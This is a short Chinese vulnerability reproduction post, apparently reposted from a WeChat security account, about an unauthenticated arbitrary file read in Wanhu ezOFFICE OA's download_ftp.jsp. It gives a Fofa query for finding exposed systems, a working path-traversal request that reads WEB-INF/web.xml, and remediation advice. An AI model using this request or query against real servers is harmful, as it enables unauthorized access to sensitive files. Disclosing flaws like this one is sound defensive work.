产品简介
万户软件网络是业内普遍认可的智慧政务办公专家,OA系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。
漏洞描述
万户OA-ezOFFICE download_ftp.jsp 接口存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
网络空间测绘
Fofa
app="万户网络-ezOFFICE"
漏洞复现
/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
修复建议
1、如⾮必要,禁⽌公⽹访问该系统。
2、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。
3、升级产品到最新版本
原文始发于微信公众号(凝聚力安全团队):【漏洞复现】万户-ezOFFICE download_ftp.jsp 任意文件下载漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论